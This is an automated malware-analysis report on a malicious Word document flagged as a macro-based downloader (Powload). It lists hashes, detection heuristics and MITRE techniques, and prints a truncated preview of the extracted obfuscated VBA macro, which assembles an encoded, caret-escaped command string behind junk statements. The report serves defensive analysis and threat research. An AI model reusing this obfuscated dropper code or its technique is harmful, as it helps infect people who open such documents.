Office (OLE) malware analysis — malicious · cb51ca9a00921f7c

MALICIOUS

Office (OLE)

91.0 KB Created: 2018-08-28 12:08:00 Authoring application: Microsoft Office Word First seen: 2019-08-04

MD5: 2b0db49374cdd0b77cd52e49602bd8a9 SHA-1: 80fa840c29765b474919decca431e8ce5ae7634b SHA-256: cb51ca9a00921f7cbec21dff2f2ffd7988d64bdff4388a4606dabfc681eb3985

242 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File

The sample is a malicious Office document containing VBA macros. A critical heuristic firing indicates the presence of a Shell() call within the VBA code, which is often used to download and execute further malicious content. The ClamAV detection name 'Doc.Dropper.Powload-6665582-0' further supports this dropper functionality. No specific family could be identified, but the technique suggests a macro-based downloader.

Heuristics 7

ClamAV: Doc.Dropper.Powload-6665582-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Dropper.Powload-6665582-0
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 11149 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	11149 bytes
SHA-256: `f77cb9416dbe3ad0b1eaf1c96d51d67dfec992a63a7e1a0990e00f1ac1d1e267`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "lnufdWRRiAzVAC" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "SzjTruX" Function jrpRadibLr() On _ Error _ Resume _ Next On _ Error _ Resume _ Next On _ Error _ Resume _ Next On _ Error _ Resume _ Next Error lFPZV / bAETi BizsYCqbSm = "MD /" + "v^" + ":^oN^ " + " /R " + Chr(0 + 2 + 2 + 2 + 28) + " ^s" + "^e^T " + " ^tA^M=" + "^" + "==^A^" + "Ag^AAI^" Error 36220 / 69325 QmtpXiJ = "AAC^A^" + "g^A^A" + "^I" + "^A^" + "ACA" + "g^A^A^" + "I" + "^" Error wXFtnT * ClWtti * 77954 / MVmnDk Error 69448 * aFbwVO GtFPocIZr = "A^A" + "C^A" + "gA" + "AI^AA" + "C^A^g" + "^A^A" + "I" + "A^ACA^" Error jWCKK * tKhci Error 10768 / ULZbpL * rwiJk * ZsLDNa Error ariLQw * jqKmSO Error ajDmRu / RRmsd * 56688 * LBJKOv wHqJYA = "g^" + "A" + "A" + "^IA0HA9" + "^B" + "weA^g" + "G" + "A^j^" + "B" + "^A^dA" + "^E^GA" + "jB" + "^" Error VCBiI * HzhpUr / bsTWFA / wzUzNc Error 39180 / GpQTj Error 98751 / hUoTw Error QdbVi * QfLIo Error 43952 * LDnjw zWHRo = "Q^fA^" + "s^D^" + "ArBQ^Y" + "AU^G^" + "A^y" + "B^g" Error YmlVuL * NLzDz * 65406 / mAjbr Error 46159 / 79240 Error oVuXc * 51982 waVtCqzS = "^Y^As^" + "D" + "ACB^w" + "^Y^AM^E" + "^Ak^" + "A^AIA" + "0GAlB" + "A^" Error 54 * iDfwpi / DScSj / 41721 Error 86010 / 20028 Error 26436 / UIjRR * 63531 * Rdkks JMcGjHqmzNG = "d^A^kE^" + "A" + "^t^AQ^" + "ZA^sG" + "Av" + "B^g^d^" + "A4^GA^" + "J^Bw^O" + "AkC^ACB" + "w^YA^M^" + "E^Ak^" Error 97436 / jVilM * UWsBFA / fSwtnf Error lOQRNo / ikLjX * 70364 * oucwn Error 23918 * 48641 dJXzzALHB = "A^AI^" + "A^" + "wC^A^" + "3^B^Q" + "U^A" + "^8E^Ak" Error jwSlw * TXawH Error 8275 * qsnmM Error 38985 / 97878 Error 78962 / hpzwls Error 4444 / IqVdAW PuQrrlw = "^" + "AA^KAU" + "^GAsB^Q" + "a^A^Y" + "EAk^BQ" + "^Y^" + "A^8^G^A" + "^s" + "Bg" + "bAc" + "HAv^B" + "^ARA^" Error 20363 * hdHzu Error QYGuj / phjdbk * lIcaRC * sWwGd Error vbJsz / 3886 * vaiwA / KOFOn VPbKzfBLsR = "4" + "C^Av" + "BwY" + "Ag^EA" + "kAw" + "e" Error ZAjfs / fuazQq / tGWkd * YqitcR Error iRjSPS / WacMFT Error 1686 * 99442 * hKvRIi * JjwirH hcUoCnBK = "^A^k" + "^H" + "^A^yBAd" + "^A^s" + "HA^p" + "AAT" Error 6407 * BdrhBX / WjuYYP * piKuGt Error 41909 / 67304 rwWIVU = "A^Q^EA^" + "BB^A^" + "JAACAu^" + "B" + "Qa^A^A" + "C^" + "A3" + "BQ^U" + "A^8" + "E^" + "Ak^A" Error 66702 / DfSYz mnHWnCj = "AKAg^G" + "A^jB^" + "Q^Y^A" + "^" + "U^GA^y" + "B^w^b^A" jrpRadibLr = BizsYCqbSm + QmtpXiJ + GtFPocIZr + wHqJYA + zWHRo + waVtCqzS + JMcGjHqmzNG + dJXzzALHB + PuQrrlw + VPbKzfBLsR + hcUoCnBK + rwWIVU + mnHWnCj Error 66718 * IBfmP / coFlRJ / IzJIJR Error OSiOd / ajpun Error lYTEcr * VaWnG Error IPUif / uAXRKK / UPpsK * dXdMi End Function Function qAFJG() On _ Error _ Resume _ Next On _ Error _ Resume _ Next On _ Error _ Resume _ Next On _ Error _ Resume _ Next On _ Error _ Resume _ Next Error RUsGli * 55909 * oCiCl / cfcVJo wwVNfmjO = "^YGA" + "7" + "^AwJ" + "A^" + "U" + "^G^A4B" + "Q^Z" + "A4C" + "A" + "n^A^wK" Error fUBNZR / mcLoVi Error 22975 / jABmjL Error 3793 / IGXPsN / hjNlkR / kKQCr Error 42860 * JQcZoF * HUdzaR * HWjwA Error HaJSw * cQIAE tpXHJp = "AMHA" + "L^" + "B" + "^g^aA^" + "QC^Ar" + "^A" + "wJAwF" + "AnAw^" Error 93750 * nSZij Error 87963 / krmZC * StwirB / 80968 Error rpVqL / uJCOAi zBzHwUj = "KA" + "M^GA" + "p^B^Ab^" + "AI^" + "G^A^1^B" + "A" + "cA" + "oDA" + "^2B^g^b" + "^" + "AUG^" Error EdORY * KqZXpG bnswXOfGGB = "AkAQ^PA" + "^I^E^A" + "^" + "j^B^w" + "^Q^" + "AQC^" + "A7^" + "A" + "^" + "wJ^AYDA" Error uQULh / Niifpi Error 20822 * KBUdd BXLAczz = "4^A^wM" + "AcCA" + "^gA^Q^" + "PAAC^A" + "z^B" + "^w^SAo" + "^G" + "^A" + "kA^" Error 46817 / 89063 Error 63703 / wTVWna * TjOGrZ * ufmita Error 44862 * omdFJ ... (truncated)

SHA-256: f77cb9416dbe3ad0b1eaf1c96d51d67dfec992a63a7e1a0990e00f1ac1d1e267

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "lnufdWRRiAzVAC"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "SzjTruX"
Function jrpRadibLr()

On _
Error _
Resume _
Next

On _
Error _
Resume _
Next

On _
Error _
Resume _
Next

On _
Error _
Resume _
Next
Error lFPZV / bAETi
BizsYCqbSm = "MD /" + "v^" + ":^oN^ " + " /R    " + Chr(0 + 2 + 2 + 2 + 28) + "  ^s" + "^e^T   " + " ^tA^M=" + "^" + "==^A^" + "Ag^AAI^"
Error 36220 / 69325
QmtpXiJ = "AAC^A^" + "g^A^A" + "^I" + "^A^" + "ACA" + "g^A^A^" + "I" + "^"
Error wXFtnT * ClWtti * 77954 / MVmnDk
   Error 69448 * aFbwVO
GtFPocIZr = "A^A" + "C^A" + "gA" + "AI^AA" + "C^A^g" + "^A^A" + "I" + "A^ACA^"
Error jWCKK * tKhci
   Error 10768 / ULZbpL * rwiJk * ZsLDNa
   Error ariLQw * jqKmSO
   Error ajDmRu / RRmsd * 56688 * LBJKOv
wHqJYA = "g^" + "A" + "A" + "^IA0HA9" + "^B" + "weA^g" + "G" + "A^j^" + "B" + "^A^dA" + "^E^GA" + "jB" + "^"
Error VCBiI * HzhpUr / bsTWFA / wzUzNc
   Error 39180 / GpQTj
   Error 98751 / hUoTw
   Error QdbVi * QfLIo
   Error 43952 * LDnjw
zWHRo = "Q^fA^" + "s^D^" + "ArBQ^Y" + "AU^G^" + "A^y" + "B^g"
Error YmlVuL * NLzDz * 65406 / mAjbr
   Error 46159 / 79240
   Error oVuXc * 51982
waVtCqzS = "^Y^As^" + "D" + "ACB^w" + "^Y^AM^E" + "^Ak^" + "A^AIA" + "0GAlB" + "A^"
Error 54 * iDfwpi / DScSj / 41721
   Error 86010 / 20028
   Error 26436 / UIjRR * 63531 * Rdkks
JMcGjHqmzNG = "d^A^kE^" + "A" + "^t^AQ^" + "ZA^sG" + "Av" + "B^g^d^" + "A4^GA^" + "J^Bw^O" + "AkC^ACB" + "w^YA^M^" + "E^Ak^"
Error 97436 / jVilM * UWsBFA / fSwtnf
   Error lOQRNo / ikLjX * 70364 * oucwn
   Error 23918 * 48641
dJXzzALHB = "A^AI^" + "A^" + "wC^A^" + "3^B^Q" + "U^A" + "^8E^Ak"
Error jwSlw * TXawH
   Error 8275 * qsnmM
   Error 38985 / 97878
   Error 78962 / hpzwls
   Error 4444 / IqVdAW
PuQrrlw = "^" + "AA^KAU" + "^GAsB^Q" + "a^A^Y" + "EAk^BQ" + "^Y^" + "A^8^G^A" + "^s" + "Bg" + "bAc" + "HAv^B" + "^ARA^"
Error 20363 * hdHzu
   Error QYGuj / phjdbk * lIcaRC * sWwGd
   Error vbJsz / 3886 * vaiwA / KOFOn
VPbKzfBLsR = "4" + "C^Av" + "BwY" + "Ag^EA" + "kAw" + "e"
Error ZAjfs / fuazQq / tGWkd * YqitcR
   Error iRjSPS / WacMFT
   Error 1686 * 99442 * hKvRIi * JjwirH
hcUoCnBK = "^A^k" + "^H" + "^A^yBAd" + "^A^s" + "HA^p" + "AAT"
Error 6407 * BdrhBX / WjuYYP * piKuGt
   Error 41909 / 67304
rwWIVU = "A^Q^EA^" + "BB^A^" + "JAACAu^" + "B" + "Qa^A^A" + "C^" + "A3" + "BQ^U" + "A^8" + "E^" + "Ak^A"
Error 66702 / DfSYz
mnHWnCj = "AKAg^G" + "A^jB^" + "Q^Y^A" + "^" + "U^GA^y" + "B^w^b^A"
jrpRadibLr = BizsYCqbSm + QmtpXiJ + GtFPocIZr + wHqJYA + zWHRo + waVtCqzS + JMcGjHqmzNG + dJXzzALHB + PuQrrlw + VPbKzfBLsR + hcUoCnBK + rwWIVU + mnHWnCj
   Error 66718 * IBfmP / coFlRJ / IzJIJR
   Error OSiOd / ajpun
   Error lYTEcr * VaWnG
   Error IPUif / uAXRKK / UPpsK * dXdMi
End Function
Function qAFJG()

On _
Error _
Resume _
Next

On _
Error _
Resume _
Next

On _
Error _
Resume _
Next

On _
Error _
Resume _
Next

On _
Error _
Resume _
Next
Error RUsGli * 55909 * oCiCl / cfcVJo
wwVNfmjO = "^YGA" + "7" + "^AwJ" + "A^" + "U" + "^G^A4B" + "Q^Z" + "A4C" + "A" + "n^A^wK"
Error fUBNZR / mcLoVi
   Error 22975 / jABmjL
   Error 3793 / IGXPsN / hjNlkR / kKQCr
   Error 42860 * JQcZoF * HUdzaR * HWjwA
   Error HaJSw * cQIAE
tpXHJp = "AMHA" + "L^" + "B" + "^g^aA^" + "QC^Ar" + "^A" + "wJAwF" + "AnAw^"
Error 93750 * nSZij
   Error 87963 / krmZC * StwirB / 80968
   Error rpVqL / uJCOAi
zBzHwUj = "KA" + "M^GA" + "p^B^Ab^" + "AI^" + "G^A^1^B" + "A" + "cA" + "oDA" + "^2B^g^b" + "^" + "AUG^"
Error EdORY * KqZXpG
bnswXOfGGB = "AkAQ^PA" + "^I^E^A" + "^" + "j^B^w" + "^Q^" + "AQC^" + "A7^" + "A" + "^" + "wJ^AYDA"
Error uQULh / Niifpi
   Error 20822 * KBUdd
BXLAczz = "4^A^wM" + "AcCA" + "^gA^Q^" + "PAAC^A" + "z^B" + "^w^SAo" + "^G" + "^A" + "kA^"
Error 46817 / 89063
   Error 63703 / wTVWna * TjOGrZ * ufmita
   Error 44862 * omdFJ

... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.